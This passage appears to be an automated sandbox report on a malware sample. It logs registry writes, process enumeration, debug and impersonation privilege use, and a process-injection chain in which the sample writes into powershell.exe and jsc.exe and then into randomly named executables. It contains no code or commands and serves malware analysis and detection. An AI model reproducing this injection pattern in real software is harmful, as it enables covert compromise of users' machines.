Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time" C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe N/A
N/A N/A C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe N/A
N/A N/A C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
N/A N/A C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
N/A N/A C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe N/A
N/A N/A C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe N/A
N/A N/A C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2g4.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2g4.0.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 716 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 716 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 716 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 716 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 716 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 716 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 716 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 716 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 716 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 716 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 716 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 716 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 716 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 4332 wrote to memory of 3172 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe
PID 4332 wrote to memory of 3172 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe
PID 4332 wrote to memory of 3172 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\zEPbmh410knZcspyfGDS7ORv.exe
PID 4332 wrote to memory of 2240 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe
PID 4332 wrote to memory of 2240 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe
PID 4332 wrote to memory of 2240 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe
PID 4332 wrote to memory of 244 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe
PID 4332 wrote to memory of 244 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe
PID 4332 wrote to memory of 244 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\EEyBniRdBsZC5mxxZLlQ4Fr2.exe
PID 4332 wrote to memory of 1224 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe
PID 4332 wrote to memory of 1224 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe
PID 4332 wrote to memory of 1224 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\9vbvS6oLRF12GScdDI45jaXw.exe
PID 4332 wrote to memory of 3936 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe
PID 4332 wrote to memory of 3936 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe
PID 4332 wrote to memory of 3936 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\ccoo5BlZcHqJPIQURYx78bxz.exe
PID 4332 wrote to memory of 1140 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe
PID 4332 wrote to memory of 1140 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\ub3dpREG7Tcuj2uRy2diwUGo.exe
PID 4332 wrote to memory of 4240 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\hFyK7KqQVxnK605yowtvP7UA.exe
PID 4332 wrote to memory of 4240 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\hFyK7KqQVxnK605yowtvP7UA.exe
PID 4332 wrote to memory of 4240 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\hFyK7KqQVxnK605yowtvP7UA.exe
PID 2240 wrote to memory of 2924 N/A C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2240 wrote to memory of 2924 N/A C:\Users\Admin\Pictures\2oyXsl7pvbVirJgqH7QUtCPr.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
